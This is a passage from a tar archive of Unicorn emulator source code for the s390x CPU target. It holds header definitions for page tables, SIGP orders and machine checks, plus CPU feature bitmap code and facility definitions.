REGION3_ENTRY_RFAA 0xffffffff80000000ULL #define REGION3_ENTRY_AV 0x0000000000010000ULL #define REGION3_ENTRY_ACC 0x000000000000f000ULL #define REGION3_ENTRY_F 0x0000000000000800ULL #define REGION3_ENTRY_FC 0x0000000000000400ULL #define REGION3_ENTRY_IEP 0x0000000000000100ULL #define REGION3_ENTRY_CR 0x0000000000000010ULL #define SEGMENT_ENTRY_ORIGIN 0xfffffffffffff800ULL #define SEGMENT_ENTRY_SFAA 0xfffffffffff00000ULL #define SEGMENT_ENTRY_AV 0x0000000000010000ULL #define SEGMENT_ENTRY_ACC 0x000000000000f000ULL #define SEGMENT_ENTRY_F 0x0000000000000800ULL #define SEGMENT_ENTRY_FC 0x0000000000000400ULL #define SEGMENT_ENTRY_P 0x0000000000000200ULL #define SEGMENT_ENTRY_IEP 0x0000000000000100ULL #define SEGMENT_ENTRY_I 0x0000000000000020ULL #define SEGMENT_ENTRY_CS 0x0000000000000010ULL #define SEGMENT_ENTRY_TT 0x000000000000000cULL #define SEGMENT_ENTRY_TT_SEGMENT 0x0000000000000000ULL #define PAGE_ENTRY_0 0x0000000000000800ULL #define PAGE_ENTRY_I 0x0000000000000400ULL #define PAGE_ENTRY_P 0x0000000000000200ULL #define PAGE_ENTRY_IEP 0x0000000000000100ULL #define VADDR_REGION1_TX_MASK 0xffe0000000000000ULL #define VADDR_REGION2_TX_MASK 0x001ffc0000000000ULL #define VADDR_REGION3_TX_MASK 0x000003ff80000000ULL #define VADDR_SEGMENT_TX_MASK 0x000000007ff00000ULL #define VADDR_PAGE_TX_MASK 0x00000000000ff000ULL #define VADDR_REGION1_TX(vaddr) (((vaddr) & VADDR_REGION1_TX_MASK) >> 53) #define VADDR_REGION2_TX(vaddr) (((vaddr) & VADDR_REGION2_TX_MASK) >> 42) #define VADDR_REGION3_TX(vaddr) (((vaddr) & VADDR_REGION3_TX_MASK) >> 31) #define VADDR_SEGMENT_TX(vaddr) (((vaddr) & VADDR_SEGMENT_TX_MASK) >> 20) #define VADDR_PAGE_TX(vaddr) (((vaddr) & VADDR_PAGE_TX_MASK) >> 12) #define VADDR_REGION1_TL(vaddr) (((vaddr) & 0xc000000000000000ULL) >> 62) #define VADDR_REGION2_TL(vaddr) (((vaddr) & 0x0018000000000000ULL) >> 51) #define VADDR_REGION3_TL(vaddr) (((vaddr) & 0x0000030000000000ULL) >> 40) #define VADDR_SEGMENT_TL(vaddr) (((vaddr) & 0x0000000060000000ULL) >> 29) #define SK_C (0x1 << 1) #define SK_R (0x1 << 2) #define SK_F (0x1 << 3) #define SK_ACC_MASK (0xf << 4) /* SIGP order codes */ #define SIGP_SENSE 0x01 #define SIGP_EXTERNAL_CALL 0x02 #define SIGP_EMERGENCY 0x03 #define SIGP_START 0x04 #define SIGP_STOP 0x05 #define SIGP_RESTART 0x06 #define SIGP_STOP_STORE_STATUS 0x09 #define SIGP_INITIAL_CPU_RESET 0x0b #define SIGP_CPU_RESET 0x0c #define SIGP_SET_PREFIX 0x0d #define SIGP_STORE_STATUS_ADDR 0x0e #define SIGP_SET_ARCH 0x12 #define SIGP_COND_EMERGENCY 0x13 #define SIGP_SENSE_RUNNING 0x15 #define SIGP_STORE_ADTL_STATUS 0x17 /* SIGP condition codes */ #define SIGP_CC_ORDER_CODE_ACCEPTED 0 #define SIGP_CC_STATUS_STORED 1 #define SIGP_CC_BUSY 2 #define SIGP_CC_NOT_OPERATIONAL 3 /* SIGP status bits */ #define SIGP_STAT_EQUIPMENT_CHECK 0x80000000UL #define SIGP_STAT_NOT_RUNNING 0x00000400UL #define SIGP_STAT_INCORRECT_STATE 0x00000200UL #define SIGP_STAT_INVALID_PARAMETER 0x00000100UL #define SIGP_STAT_EXT_CALL_PENDING 0x00000080UL #define SIGP_STAT_STOPPED 0x00000040UL #define SIGP_STAT_OPERATOR_INTERV 0x00000020UL #define SIGP_STAT_CHECK_STOP 0x00000010UL #define SIGP_STAT_INOPERATIVE 0x00000004UL #define SIGP_STAT_INVALID_ORDER 0x00000002UL #define SIGP_STAT_RECEIVER_CHECK 0x00000001UL /* SIGP SET ARCHITECTURE modes */ #define SIGP_MODE_ESA_S390 0 #define SIGP_MODE_Z_ARCH_TRANS_ALL_PSW 1 #define SIGP_MODE_Z_ARCH_TRANS_CUR_PSW 2 /* SIGP order code mask corresponding to bit positions 56-63 */ #define SIGP_ORDER_MASK 0x000000ff /* machine check interruption code */ /* subclasses */ #define MCIC_SC_SD 0x8000000000000000ULL #define MCIC_SC_PD 0x4000000000000000ULL #define MCIC_SC_SR 0x2000000000000000ULL #define MCIC_SC_CD 0x0800000000000000ULL #define MCIC_SC_ED 0x0400000000000000ULL #define MCIC_SC_DG 0x0100000000000000ULL #define MCIC_SC_W 0x0080000000000000ULL #define MCIC_SC_CP 0x0040000000000000ULL #define MCIC_SC_SP 0x0020000000000000ULL #define MCIC_SC_CK 0x0010000000000000ULL /* subclass modifiers */ #define MCIC_SCM_B 0x0002000000000000ULL #define MCIC_SCM_DA 0x0000000020000000ULL #define MCIC_SCM_AP 0x0000000000080000ULL /* storage errors */ #define MCIC_SE_SE 0x0000800000000000ULL #define MCIC_SE_SC 0x0000400000000000ULL #define MCIC_SE_KE 0x0000200000000000ULL #define MCIC_SE_DS 0x0000100000000000ULL #define MCIC_SE_IE 0x0000000080000000ULL /* validity bits */ #define MCIC_VB_WP 0x0000080000000000ULL #define MCIC_VB_MS 0x0000040000000000ULL #define MCIC_VB_PM 0x0000020000000000ULL #define MCIC_VB_IA 0x0000010000000000ULL #define MCIC_VB_FA 0x0000008000000000ULL #define MCIC_VB_VR 0x0000004000000000ULL #define MCIC_VB_EC 0x0000002000000000ULL #define MCIC_VB_FP 0x0000001000000000ULL #define MCIC_VB_GR 0x0000000800000000ULL #define MCIC_VB_CR 0x0000000400000000ULL #define MCIC_VB_ST 0x0000000100000000ULL #define MCIC_VB_AR 0x0000000040000000ULL #define MCIC_VB_GS 0x0000000008000000ULL #define MCIC_VB_PR 0x0000000000200000ULL #define MCIC_VB_FC 0x0000000000100000ULL #define MCIC_VB_CT 0x0000000000020000ULL #define MCIC_VB_CC 0x0000000000010000ULL static inline uint64_t s390_build_validity_mcic(struct uc_struct *uc) { uint64_t mcic; /* * Indicate all validity bits (no damage) only. Other bits have to be * added by the caller. (storage errors, subclasses and subclass modifiers) */ mcic = MCIC_VB_WP | MCIC_VB_MS | MCIC_VB_PM | MCIC_VB_IA | MCIC_VB_FP | MCIC_VB_GR | MCIC_VB_CR | MCIC_VB_ST | MCIC_VB_AR | MCIC_VB_PR | MCIC_VB_FC | MCIC_VB_CT | MCIC_VB_CC; if (s390_has_feat(uc, S390_FEAT_VECTOR)) { mcic |= MCIC_VB_VR; } if (s390_has_feat(uc, S390_FEAT_GUARDED_STORAGE)) { mcic |= MCIC_VB_GS; } return mcic; } static inline void s390_do_cpu_full_reset(CPUState *cs, run_on_cpu_data arg) { cpu_reset(cs); } static inline void s390_do_cpu_reset(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->reset(cs, S390_CPU_RESET_NORMAL); } static inline void s390_do_cpu_initial_reset(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->reset(cs, S390_CPU_RESET_INITIAL); } static inline void s390_do_cpu_load_normal(CPUState *cs, run_on_cpu_data arg) { S390CPUClass *scc = S390_CPU_GET_CLASS(cs); scc->load_normal(cs); } /* cpu.c */ void s390_crypto_reset(void); int s390_set_memory_limit(uint64_t new_limit, uint64_t *hw_limit); void s390_set_max_pagesize(uint64_t pagesize); void s390_cmma_reset(void); void s390_enable_css_support(S390CPU *cpu); unsigned int s390_cpu_set_state(uint8_t cpu_state, S390CPU *cpu); static inline uint8_t s390_cpu_get_state(S390CPU *cpu) { return cpu->env.cpu_state; } /* cpu_models.c */ void s390_cpu_list(void); #define cpu_list s390_cpu_list void s390_set_qemu_cpu_model(uint16_t type, uint8_t gen, uint8_t ec_ga, const S390FeatInit feat_init); /* helper.c */ #define S390_CPU_TYPE_SUFFIX "-" TYPE_S390_CPU #define S390_CPU_TYPE_NAME(name) (name S390_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_S390_CPU /* you can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. non zero is returned if the signal was handled by the virtual CPU. */ int cpu_s390x_signal_handler(int host_signum, void *pinfo, void *puc); #define cpu_signal_handler cpu_s390x_signal_handler /* interrupt.c */ void s390_crw_mchk(void); void s390_io_interrupt(uint16_t subchannel_id, uint16_t subchannel_nr, uint32_t io_int_parm, uint32_t io_int_word); #define RA_IGNORED 0 void s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra); /* service interrupts are floating therefore we must not pass an cpustate */ void s390_sclp_extint(uint32_t parm); /* mmu_helper.c */ int s390_cpu_virt_mem_rw(S390CPU *cpu, vaddr laddr, uint8_t ar, void *hostbuf, int len, bool is_write); #define s390_cpu_virt_mem_read(cpu, laddr, ar, dest, len) \ s390_cpu_virt_mem_rw(cpu, laddr, ar, dest, len, false) #define s390_cpu_virt_mem_write(cpu, laddr, ar, dest, len) \ s390_cpu_virt_mem_rw(cpu, laddr, ar, dest, len, true) #define s390_cpu_virt_mem_check_read(cpu, laddr, ar, len) \ s390_cpu_virt_mem_rw(cpu, laddr, ar, NULL, len, false) #define s390_cpu_virt_mem_check_write(cpu, laddr, ar, len) \ s390_cpu_virt_mem_rw(cpu, laddr, ar, NULL, len, true) void s390_cpu_virt_mem_handle_exc(S390CPU *cpu, uintptr_t ra); /* sigp.c */ int s390_cpu_restart(S390CPU *cpu); void s390_init_sigp(void); /* outside of target/s390x/ */ S390CPU *s390_cpu_addr2state(uint16_t cpu_addr); typedef CPUS390XState CPUArchState; typedef S390CPU ArchCPU; #include "exec/cpu-all.h" typedef enum CpuS390State { S390_CPU_STATE_UNINITIALIZED, S390_CPU_STATE_STOPPED, S390_CPU_STATE_CHECK_STOP, S390_CPU_STATE_OPERATING, S390_CPU_STATE_LOAD, S390_CPU_STATE__MAX, } CpuS390State; #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features.c������������������������������������������������������0000664�0000000�0000000�00000015612�14675241067�0021165�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU features/facilities for s390x * * Copyright IBM Corp. 2016, 2018 * Copyright Red Hat, Inc. 2019 * * Author(s): David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "cpu_features.h" #define DEF_FEAT(_FEAT, _NAME, _TYPE, _BIT, _DESC) \ [S390_FEAT_##_FEAT] = { \ .name = _NAME, \ .type = S390_FEAT_TYPE_##_TYPE, \ .bit = _BIT, \ .desc = _DESC, \ }, static const S390FeatDef s390_features[S390_FEAT_MAX] = { #include "cpu_features_def.inc.h" }; #undef DEF_FEAT const S390FeatDef *s390_feat_def(S390Feat feat) { return &s390_features[feat]; } S390Feat s390_feat_by_type_and_bit(S390FeatType type, int bit) { S390Feat feat; for (feat = 0; feat < ARRAY_SIZE(s390_features); feat++) { if (s390_features[feat].type == type && s390_features[feat].bit == bit) { return feat; } } return S390_FEAT_MAX; } void s390_init_feat_bitmap(const S390FeatInit init, S390FeatBitmap bitmap) { int i, j; for (i = 0; i < (S390_FEAT_MAX / 64 + 1); i++) { if (init[i]) { for (j = 0; j < 64; j++) { if (init[i] & 1ULL << j) { set_bit(i * 64 + j, bitmap); } } } } } void s390_fill_feat_block(const S390FeatBitmap features, S390FeatType type, uint8_t *data) { S390Feat feat; int bit_nr; switch (type) { case S390_FEAT_TYPE_STFL: if (test_bit(S390_FEAT_ZARCH, features)) { /* Features that are always active */ set_be_bit(2, data); /* z/Architecture */ set_be_bit(138, data); /* Configuration-z-architectural-mode */ } break; case S390_FEAT_TYPE_PTFF: case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KMC: case S390_FEAT_TYPE_KM: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_KMCTR: case S390_FEAT_TYPE_KMF: case S390_FEAT_TYPE_KMO: case S390_FEAT_TYPE_PCC: case S390_FEAT_TYPE_PPNO: case S390_FEAT_TYPE_KMA: case S390_FEAT_TYPE_KDSA: case S390_FEAT_TYPE_SORTL: case S390_FEAT_TYPE_DFLTCC: set_be_bit(0, data); /* query is always available */ break; default: break; }; feat = find_first_bit(features, S390_FEAT_MAX); while (feat < S390_FEAT_MAX) { if (s390_features[feat].type == type) { bit_nr = s390_features[feat].bit; /* big endian on uint8_t array */ set_be_bit(bit_nr, data); } feat = find_next_bit(features, S390_FEAT_MAX, feat + 1); } } void s390_add_from_feat_block(S390FeatBitmap features, S390FeatType type, uint8_t *data) { int nr_bits, le_bit; switch (type) { case S390_FEAT_TYPE_STFL: nr_bits = 16384; break; case S390_FEAT_TYPE_PLO: case S390_FEAT_TYPE_SORTL: case S390_FEAT_TYPE_DFLTCC: nr_bits = 256; break; default: /* all cpu subfunctions have 128 bit */ nr_bits = 128; }; le_bit = find_first_bit((unsigned long *) data, nr_bits); while (le_bit < nr_bits) { /* convert the bit number to a big endian bit nr */ S390Feat feat = s390_feat_by_type_and_bit(type, BE_BIT_NR(le_bit)); /* ignore unknown bits */ if (feat < S390_FEAT_MAX) { set_bit(feat, features); } le_bit = find_next_bit((unsigned long *) data, nr_bits, le_bit + 1); } } void s390_feat_bitmap_to_ascii(const S390FeatBitmap features, void *opaque, void (*fn)(const char *name, void *opaque)) { S390FeatBitmap bitmap, tmp; S390FeatGroup group; S390Feat feat; bitmap_copy(bitmap, features, S390_FEAT_MAX); /* process whole groups first */ for (group = 0; group < S390_FEAT_GROUP_MAX; group++) { const S390FeatGroupDef *def = s390_feat_group_def(group); bitmap_and(tmp, bitmap, def->feat, S390_FEAT_MAX); if (bitmap_equal(tmp, def->feat, S390_FEAT_MAX)) { bitmap_andnot(bitmap, bitmap, def->feat, S390_FEAT_MAX); fn(def->name, opaque); } } /* report leftovers as separate features */ feat = find_first_bit(bitmap, S390_FEAT_MAX); while (feat < S390_FEAT_MAX) { fn(s390_feat_def(feat)->name, opaque); feat = find_next_bit(bitmap, S390_FEAT_MAX, feat + 1); }; } #define FEAT_GROUP_INIT(_name, _group, _desc) \ { \ .name = _name, \ .desc = _desc, \ .init = { S390_FEAT_GROUP_LIST_ ## _group }, \ } /* indexed by feature group number for easy lookup */ static S390FeatGroupDef s390_feature_groups[] = { FEAT_GROUP_INIT("plo", PLO, "Perform-locked-operation facility"), FEAT_GROUP_INIT("tods", TOD_CLOCK_STEERING, "Tod-clock-steering facility"), FEAT_GROUP_INIT("gen13ptff", GEN13_PTFF, "PTFF enhancements introduced with z13"), FEAT_GROUP_INIT("msa", MSA, "Message-security-assist facility"), FEAT_GROUP_INIT("msa1", MSA_EXT_1, "Message-security-assist-extension 1 facility"), FEAT_GROUP_INIT("msa2", MSA_EXT_2, "Message-security-assist-extension 2 facility"), FEAT_GROUP_INIT("msa3", MSA_EXT_3, "Message-security-assist-extension 3 facility"), FEAT_GROUP_INIT("msa4", MSA_EXT_4, "Message-security-assist-extension 4 facility"), FEAT_GROUP_INIT("msa5", MSA_EXT_5, "Message-security-assist-extension 5 facility"), FEAT_GROUP_INIT("msa6", MSA_EXT_6, "Message-security-assist-extension 6 facility"), FEAT_GROUP_INIT("msa7", MSA_EXT_7, "Message-security-assist-extension 7 facility"), FEAT_GROUP_INIT("msa8", MSA_EXT_8, "Message-security-assist-extension 8 facility"), FEAT_GROUP_INIT("msa9", MSA_EXT_9, "Message-security-assist-extension 9 facility"), FEAT_GROUP_INIT("msa9_pckmo", MSA_EXT_9_PCKMO, "Message-security-assist-extension 9 PCKMO subfunctions"), FEAT_GROUP_INIT("mepochptff", MULTIPLE_EPOCH_PTFF, "PTFF enhancements introduced with Multiple-epoch facility"), FEAT_GROUP_INIT("esort", ENH_SORT, "Enhanced-sort facility"), FEAT_GROUP_INIT("deflate", DEFLATE_CONVERSION, "Deflate-conversion facility"), }; const S390FeatGroupDef *s390_feat_group_def(S390FeatGroup group) { return &s390_feature_groups[group]; } void init_groups(void) { int i; /* init all bitmaps from gnerated data initially */ for (i = 0; i < ARRAY_SIZE(s390_feature_groups); i++) { s390_init_feat_bitmap(s390_feature_groups[i].init, s390_feature_groups[i].feat); } } ����������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features.h������������������������������������������������������0000664�0000000�0000000�00000006065�14675241067�0021174�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU features/facilities helper structs and utility functions for s390 * * Copyright 2016 IBM Corp. * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_CPU_FEATURES_H #define TARGET_S390X_CPU_FEATURES_H #include "qemu/bitmap.h" #include "cpu_features_def.h" #include "gen-features.h" /* CPU features are announced via different ways */ typedef enum { S390_FEAT_TYPE_STFL, S390_FEAT_TYPE_SCLP_CONF_CHAR, S390_FEAT_TYPE_SCLP_CONF_CHAR_EXT, S390_FEAT_TYPE_SCLP_CPU, S390_FEAT_TYPE_MISC, S390_FEAT_TYPE_PLO, S390_FEAT_TYPE_PTFF, S390_FEAT_TYPE_KMAC, S390_FEAT_TYPE_KMC, S390_FEAT_TYPE_KM, S390_FEAT_TYPE_KIMD, S390_FEAT_TYPE_KLMD, S390_FEAT_TYPE_PCKMO, S390_FEAT_TYPE_KMCTR, S390_FEAT_TYPE_KMF, S390_FEAT_TYPE_KMO, S390_FEAT_TYPE_PCC, S390_FEAT_TYPE_PPNO, S390_FEAT_TYPE_KMA, S390_FEAT_TYPE_KDSA, S390_FEAT_TYPE_SORTL, S390_FEAT_TYPE_DFLTCC, } S390FeatType; /* Definition of a CPU feature */ typedef struct { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ S390FeatType type; /* feature type (way of indication)*/ int bit; /* bit within the feature type area (fixed) */ } S390FeatDef; /* use ordinary bitmap operations to work with features */ typedef unsigned long S390FeatBitmap[BITS_TO_LONGS(S390_FEAT_MAX)]; /* 64bit based bitmap used to init S390FeatBitmap from generated data */ typedef uint64_t S390FeatInit[S390_FEAT_MAX / 64 + 1]; const S390FeatDef *s390_feat_def(S390Feat feat); S390Feat s390_feat_by_type_and_bit(S390FeatType type, int bit); void s390_init_feat_bitmap(const S390FeatInit init, S390FeatBitmap bitmap); void s390_fill_feat_block(const S390FeatBitmap features, S390FeatType type, uint8_t *data); void s390_add_from_feat_block(S390FeatBitmap features, S390FeatType type, uint8_t *data); void s390_feat_bitmap_to_ascii(const S390FeatBitmap features, void *opaque, void (*fn)(const char *name, void *opaque)); /* Definition of a CPU feature group */ typedef struct { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ S390FeatBitmap feat; /* features contained in the group */ S390FeatInit init; /* used to init feat from generated data */ } S390FeatGroupDef; const S390FeatGroupDef *s390_feat_group_def(S390FeatGroup group); #define BE_BIT_NR(BIT) (BIT ^ (BITS_PER_LONG - 1)) static inline void set_be_bit(unsigned int bit_nr, uint8_t *array) { array[bit_nr / 8] |= 0x80 >> (bit_nr % 8); } static inline bool test_be_bit(unsigned int bit_nr, const uint8_t *array) { return array[bit_nr / 8] & (0x80 >> (bit_nr % 8)); } #endif /* TARGET_S390X_CPU_FEATURES_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features_def.h��������������������������������������������������0000664�0000000�0000000�00000001226�14675241067�0022004�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU features/facilities for s390 * * Copyright IBM Corp. 2016, 2018 * Copyright Red Hat, Inc. 2019 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_CPU_FEATURES_DEF_H #define TARGET_S390X_CPU_FEATURES_DEF_H #define DEF_FEAT(_FEAT, ...) S390_FEAT_##_FEAT, typedef enum { #include "cpu_features_def.inc.h" S390_FEAT_MAX, } S390Feat; #undef DEF_FEAT #endif /* TARGET_S390X_CPU_FEATURES_DEF_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_features_def.inc.h����������������������������������������������0000664�0000000�0000000�00000064140�14675241067�0022560�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RAW s390x CPU feature definitions: * * DEF_FEAT(_FEAT, _NAME, _TYPE, _BIT, _DESC): * - _FEAT: Feature (enum) name used internally (S390_FEAT_##_FEAT) * - _NAME: Feature name exposed to the user. * - _TYPE: Feature type (S390_FEAT_TYPE_##_TYPE). * - _BIT: Feature bit number within feature type block (unused for MISC). * - _DESC: Feature description, exposed to the user. * * Copyright IBM Corp. 2016, 2018 * Copyright Red Hat, Inc. 2019 * * Author(s): Michael Mueller <mimu@linux.vnet.ibm.com> * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ /* Features exposed via the STFL(E) instruction. */ DEF_FEAT(ESAN3, "esan3", STFL, 0, "Instructions marked as n3") DEF_FEAT(ZARCH, "zarch", STFL, 1, "z/Architecture architectural mode") DEF_FEAT(DAT_ENH, "dateh", STFL, 3, "DAT-enhancement facility") DEF_FEAT(IDTE_SEGMENT, "idtes", STFL, 4, "IDTE selective TLB segment-table clearing") DEF_FEAT(IDTE_REGION, "idter", STFL, 5, "IDTE selective TLB region-table clearing") DEF_FEAT(ASN_LX_REUSE, "asnlxr", STFL, 6, "ASN-and-LX reuse facility") DEF_FEAT(STFLE, "stfle", STFL, 7, "Store-facility-list-extended facility") DEF_FEAT(EDAT, "edat", STFL, 8, "Enhanced-DAT facility") DEF_FEAT(SENSE_RUNNING_STATUS, "srs", STFL, 9, "Sense-running-status facility") DEF_FEAT(CONDITIONAL_SSKE, "csske", STFL, 10, "Conditional-SSKE facility") DEF_FEAT(CONFIGURATION_TOPOLOGY, "ctop", STFL, 11, "Configuration-topology facility") DEF_FEAT(AP_QUERY_CONFIG_INFO, "apqci", STFL, 12, "Query AP Configuration Information facility") DEF_FEAT(IPTE_RANGE, "ipter", STFL, 13, "IPTE-range facility") DEF_FEAT(NONQ_KEY_SETTING, "nonqks", STFL, 14, "Nonquiescing key-setting facility") DEF_FEAT(AP_FACILITIES_TEST, "apft", STFL, 15, "AP Facilities Test facility") DEF_FEAT(EXTENDED_TRANSLATION_2, "etf2", STFL, 16, "Extended-translation facility 2") DEF_FEAT(MSA, "msa-base", STFL, 17, "Message-security-assist facility (excluding subfunctions)") DEF_FEAT(LONG_DISPLACEMENT, "ldisp", STFL, 18, "Long-displacement facility") DEF_FEAT(LONG_DISPLACEMENT_FAST, "ldisphp", STFL, 19, "Long-displacement facility has high performance") DEF_FEAT(HFP_MADDSUB, "hfpm", STFL, 20, "HFP-multiply-add/subtract facility") DEF_FEAT(EXTENDED_IMMEDIATE, "eimm", STFL, 21, "Extended-immediate facility") DEF_FEAT(EXTENDED_TRANSLATION_3, "etf3", STFL, 22, "Extended-translation facility 3") DEF_FEAT(HFP_UNNORMALIZED_EXT, "hfpue", STFL, 23, "HFP-unnormalized-extension facility") DEF_FEAT(ETF2_ENH, "etf2eh", STFL, 24, "ETF2-enhancement facility") DEF_FEAT(STORE_CLOCK_FAST, "stckf", STFL, 25, "Store-clock-fast facility") DEF_FEAT(PARSING_ENH, "parseh", STFL, 26, "Parsing-enhancement facility") DEF_FEAT(MOVE_WITH_OPTIONAL_SPEC, "mvcos", STFL, 27, "Move-with-optional-specification facility") DEF_FEAT(TOD_CLOCK_STEERING, "tods-base", STFL, 28, "TOD-clock-steering facility (excluding subfunctions)") DEF_FEAT(ETF3_ENH, "etf3eh", STFL, 30, "ETF3-enhancement facility") DEF_FEAT(EXTRACT_CPU_TIME, "ectg", STFL, 31, "Extract-CPU-time facility") DEF_FEAT(COMPARE_AND_SWAP_AND_STORE, "csst", STFL, 32, "Compare-and-swap-and-store facility") DEF_FEAT(COMPARE_AND_SWAP_AND_STORE_2, "csst2", STFL, 33, "Compare-and-swap-and-store facility 2") DEF_FEAT(GENERAL_INSTRUCTIONS_EXT, "ginste", STFL, 34, "General-instructions-extension facility") DEF_FEAT(EXECUTE_EXT, "exrl", STFL, 35, "Execute-extensions facility") DEF_FEAT(ENHANCED_MONITOR, "emon", STFL, 36, "Enhanced-monitor facility") DEF_FEAT(FLOATING_POINT_EXT, "fpe", STFL, 37, "Floating-point extension facility") DEF_FEAT(ORDER_PRESERVING_COMPRESSION, "opc", STFL, 38, "Order Preserving Compression facility") DEF_FEAT(SET_PROGRAM_PARAMETERS, "sprogp", STFL, 40, "Set-program-parameters facility") DEF_FEAT(FLOATING_POINT_SUPPPORT_ENH, "fpseh", STFL, 41, "Floating-point-support-enhancement facilities") DEF_FEAT(DFP, "dfp", STFL, 42, "DFP (decimal-floating-point) facility") DEF_FEAT(DFP_FAST, "dfphp", STFL, 43, "DFP (decimal-floating-point) facility has high performance") DEF_FEAT(PFPO, "pfpo", STFL, 44, "PFPO instruction") DEF_FEAT(STFLE_45, "stfle45", STFL, 45, "Various facilities introduced with z196") DEF_FEAT(CMPSC_ENH, "cmpsceh", STFL, 47, "CMPSC-enhancement facility") DEF_FEAT(DFP_ZONED_CONVERSION, "dfpzc", STFL, 48, "Decimal-floating-point zoned-conversion facility") DEF_FEAT(STFLE_49, "stfle49", STFL, 49, "Various facilities introduced with zEC12") DEF_FEAT(CONSTRAINT_TRANSACTIONAL_EXE, "cte", STFL, 50, "Constrained transactional-execution facility") DEF_FEAT(LOCAL_TLB_CLEARING, "ltlbc", STFL, 51, "Local-TLB-clearing facility") DEF_FEAT(INTERLOCKED_ACCESS_2, "iacc2", STFL, 52, "Interlocked-access facility 2") DEF_FEAT(STFLE_53, "stfle53", STFL, 53, "Various facilities introduced with z13") DEF_FEAT(ENTROPY_ENC_COMP, "eec", STFL, 54, "Entropy encoding compression facility") DEF_FEAT(MSA_EXT_5, "msa5-base", STFL, 57, "Message-security-assist-extension-5 facility (excluding subfunctions)") DEF_FEAT(MISC_INSTRUCTION_EXT, "minste2", STFL, 58, "Miscellaneous-instruction-extensions facility 2") DEF_FEAT(SEMAPHORE_ASSIST, "sema", STFL, 59, "Semaphore-assist facility") DEF_FEAT(TIME_SLICE_INSTRUMENTATION, "tsi", STFL, 60, "Time-slice Instrumentation facility") DEF_FEAT(MISC_INSTRUCTION_EXT3, "minste3", STFL, 61, "Miscellaneous-Instruction-Extensions Facility 3") DEF_FEAT(RUNTIME_INSTRUMENTATION, "ri", STFL, 64, "CPU runtime-instrumentation facility") DEF_FEAT(AP_QUEUE_INTERRUPT_CONTROL, "apqi", STFL, 65, "AP-Queue interruption facility") DEF_FEAT(ZPCI, "zpci", STFL, 69, "z/PCI facility") DEF_FEAT(ADAPTER_EVENT_NOTIFICATION, "aen", STFL, 71, "General-purpose-adapter-event-notification facility") DEF_FEAT(ADAPTER_INT_SUPPRESSION, "ais", STFL, 72, "General-purpose-adapter-interruption-suppression facility") DEF_FEAT(TRANSACTIONAL_EXE, "te", STFL, 73, "Transactional-execution facility") DEF_FEAT(STORE_HYPERVISOR_INFO, "sthyi", STFL, 74, "Store-hypervisor-information facility") DEF_FEAT(ACCESS_EXCEPTION_FS_INDICATION, "aefsi", STFL, 75, "Access-exception-fetch/store-indication facility") DEF_FEAT(MSA_EXT_3, "msa3-base", STFL, 76, "Message-security-assist-extension-3 facility (excluding subfunctions)") DEF_FEAT(MSA_EXT_4, "msa4-base", STFL, 77, "Message-security-assist-extension-4 facility (excluding subfunctions)") DEF_FEAT(EDAT_2, "edat2", STFL, 78, "Enhanced-DAT facility 2") DEF_FEAT(DFP_PACKED_CONVERSION, "dfppc", STFL, 80, "Decimal-floating-point packed-conversion facility") DEF_FEAT(PPA15, "ppa15", STFL, 81, "PPA15 is installed") DEF_FEAT(BPB, "bpb", STFL, 82, "Branch prediction blocking") DEF_FEAT(VECTOR, "vx", STFL, 129, "Vector facility") DEF_FEAT(INSTRUCTION_EXEC_PROT, "iep", STFL, 130, "Instruction-execution-protection facility") DEF_FEAT(SIDE_EFFECT_ACCESS_ESOP2, "sea_esop2", STFL, 131, "Side-effect-access facility and Enhanced-suppression-on-protection facility 2") DEF_FEAT(GUARDED_STORAGE, "gs", STFL, 133, "Guarded-storage facility") DEF_FEAT(VECTOR_PACKED_DECIMAL, "vxpd", STFL, 134, "Vector packed decimal facility") DEF_FEAT(VECTOR_ENH, "vxeh", STFL, 135, "Vector enhancements facility") DEF_FEAT(MULTIPLE_EPOCH, "mepoch", STFL, 139, 